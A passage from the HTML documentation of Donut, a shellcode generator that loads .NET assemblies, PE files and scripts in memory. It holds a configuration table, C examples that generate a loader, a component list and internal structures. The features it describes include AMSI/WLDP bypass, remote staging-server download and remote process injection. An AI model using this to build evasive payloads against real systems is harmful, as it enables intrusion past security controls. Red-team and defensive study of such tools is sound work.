131 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
132 </tr>
133 <tr>
134 <td><code>thread</code></td>
135 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
136 </tr>
137 <tr>
138 <td><code>oep</code></td>
139 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
140 </tr>
141
142 <tr>
143 <td><code>input</code></td>
144 <td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
145 </tr>
146 <tr>
147 <td><code>output</code></td>
148 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
149 </tr>
150
151 <tr>
152 <td><code>runtime</code></td>
153 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
154 </tr>
155 <tr>
156 <td><code>domain</code></td>
157 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
158 </tr>
159 <tr>
160 <td><code>cls</code></td>
161 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
162 </tr>
163 <tr>
164 <td><code>method</code></td>
165 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
166 </tr>
167
168 <tr>
169 <td><code>param</code></td>
170 <td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
171 </tr>
172 <tr>
173 <td><code>unicode</code></td>
174 <td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
175 </tr>
176
177 <tr>
178 <td><code>server</code></td>
179 <td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
180 </tr>
181
182 <tr>
183 <td><code>modname</code></td>
184 <td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
185 </tr>
186 <tr>
187 <td><code>mod_type</code></td>
188 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
189 </tr>
190 <tr>
191 <td><code>mod_len</code></td>
192 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
193 </tr>
194 <tr>
195 <td><code>mod</code></td>
196 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
197 </tr>
198
199 <tr>
200 <td><code>inst_type</code></td>
201 <td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
202 </tr>
203 <tr>
204 <td><code>inst_len</code></td>
205 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
206 </tr>
207 <tr>
208 <td><code>inst</code></td>
209 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
210 </tr>
211
212 <tr>
213 <td><code>pic_len</code></td>
214 <td>The size of data pointed to by <code>pic</code>.</td>
215 </tr>
216 <tr>
217 <td><code>pic</code></td>
218 <td>Points to the loader/shellcode. This should be injected into a remote process.</td>
219 </tr>
220 </table>
221
222 <h2 id="static">4. Static Example</h2>
223
224 <p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
225
226 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
227
228 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
229 DONUT_CONFIG c<span style='color:#800080; '>;</span>
230 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
231 <span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
232
233 <span style='color:#696969; '>// need at least a file</span>
234 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
235 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
236 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
237 <span style='color:#800080; '>}</span>
238
239 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
240
241 <span style='color:#696969; '>// copy input file</span>
242 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
243
244 <span style='color:#696969; '>// default settings</span>
245 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
246 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
247 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
248 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
249 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
250 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
251 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
252 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
253 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
254
255 <span style='color:#696969; '>// generate the shellcode</span>
256 err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
257 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
258 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
259 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
260 <span style='color:#800080; '>}</span>
261
262 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
263
264 DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
265 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
266 <span style='color:#800080; '>}</span>
267 </pre>
268
269 <h2 id="dynamic">5. Dynamic Example</h2>
270
271 <p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
272
273 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
274
275 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
276 DONUT_CONFIG c<span style='color:#800080; '>;</span>
277 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
278
279 <span style='color:#696969; '>// function pointers</span>
280 DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
281 DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
282 DonutError_t _DonutError<span style='color:#800080; '>;</span>
283
284 <span style='color:#696969; '>// need at least a file</span>
285 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
286 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
287 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
288 <span style='color:#800080; '>}</span>
289
290 <span style='color:#696969; '>// try load donut.dll or donut.so</span>
291 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
292 <span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
293 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
294 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
295 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
296 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
297
298 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
299 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
300 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
301 <span style='color:#800080; '>}</span>
302 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
303 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
304 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
305 <span style='color:#800080; '>}</span>
306 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
307 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
308 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
309 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
310 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
311 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
312
313 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
314 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
315 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
316 <span style='color:#800080; '>}</span>
317 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
318 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
319 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
320 <span style='color:#800080; '>}</span>
321 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
322
323 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
324
325 <span style='color:#696969; '>// copy input file</span>
326 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
327
328 <span style='color:#696969; '>// default settings</span>
329 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
330 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
331 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
332 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
333 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
334 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
335 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
336 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
337 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
338
339 <span style='color:#696969; '>// generate the shellcode</span>
340 err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
341 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
342 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
343 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
344 <span style='color:#800080; '>}</span>
345
346 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
347
348 _DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
349 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
350 <span style='color:#800080; '>}</span>
351 </pre>
352
353 <h2>Internals</h2>
354
355 <p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
356
357 <h2 id="com">6. Donut Components</h2>
358
359 <p>The following table lists the name of each file and what it's used for.</p>
360
361 <table border="1">
362 <tr>
363 <th>File</th>
364 <th>Description</th>
365 </tr>
366 <tr>
367 <td>donut.c</td>
368 <td>Main file for the shellcode generator.</td>
369 </tr>
370 <tr>
371 <td>include/donut.h</td>
372 <td>C header file used by the generator.</td>
373 </tr>
374 <tr>
375 <td>lib/donut.dll and lib/donut.lib</td>
376 <td>Dynamic and static libraries for Microsoft Windows.</td>
377 </tr>
378 <tr>
379 <td>lib/donut.so and lib/donut.a</td>
380 <td>Dynamic and static libraries for Linux.</td>
381 </tr>
382 <tr>
383 <td>lib/donut.h</td>
384 <td>C header file to be used in C/C++ based projects.</td>
385 </tr>
386 <tr>
387 <td>donutmodule.c</td>
388 <td>The CPython wrapper for Donut. Used by the Python module.</td>
389 </tr>
390 <tr>
391 <td>setup.py</td>
392 <td>The setup file for installing Donut as a Pip Python3 module.</td>
393 </tr>
394 <tr>
395 <td>hash.c</td>
396 <td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
397 </tr>
398 <tr>
399 <td>encrypt.c</td>
400 <td>Chaskey block cipher for encrypting modules.</td>
401 </tr>
402 <tr>
403 <td>loader/loader.c</td>
404 <td>Main file for the shellcode.</td>
405 </tr>
406 <tr>
407 <td>loader/inmem_dotnet.c</td>
408 <td>In-Memory loader for .NET EXE/DLL assemblies.</td>
409 </tr>
410 <tr>
411 <td>loader/inmem_pe.c</td>
412 <td>In-Memory loader for EXE/DLL files.</td>
413 </tr>
414 <tr>
415 <td>loader/inmem_script.c</td>
416 <td>In-Memory loader for VBScript/JScript files.</td>
417 </tr>
418 <tr>
419 <td>loader/activescript.c</td>
420 <td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
421 </tr>
422 <tr>
423 <td>loader/wscript.c</td>
424 <td>Supports a number of WScript methods that cscript/wscript support.</td>
425 </tr>
426 <tr>
427 <td>loader/depack.c</td>
428 <td>Supports unpacking of modules compressed with aPLib.</td>
429 </tr>
430 <tr>
431 <td>loader/bypass.c</td>
432 <td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
433 </tr>
434 <tr>
435 <td>loader/http_client.c</td>
436 <td>Downloads a module from remote staging server into memory.</td>
437 </tr>
438 <tr>
439 <td>loader/peb.c</td>
440 <td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
441 </tr>
442 <tr>
443 <td>loader/clib.c</td>
444 <td>Replaces common C library functions like memcmp, memcpy and memset.</td>
445 </tr>
446 <tr>
447 <td>loader/getpc.c</td>
448 <td>Assembly code stub to return the value of the EIP register.</td>
449 </tr>
450 <tr>
451 <td>loader/inject.c</td>
452 <td>Simple process injector for Windows that can be used for testing the loader.</td>
453 </tr>
454 <tr>
455 <td>loader/runsc.c</td>
456 <td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
457 </tr>
458 <tr>
459 <td>loader/exe2h/exe2h.c</td>
460 <td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
461 </tr>
462 </table>
463
464 <h2 id="instance">7. Donut Instance</h2>
465
466 <p>The loader will always contain an <var>Instance</var> which can be viewed simply as a configuration. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, if encryption is enabled, it will decrypt the data before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. The data will be decompressed if required and only then is it loaded into memory for execution.</p>
467
468 <h2 id="module">8. Donut Module</h2>
469
470 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
471
472 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
473 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
474 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
475 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
476
477 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
478 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
479 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
480 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
481
482 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
483 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
484
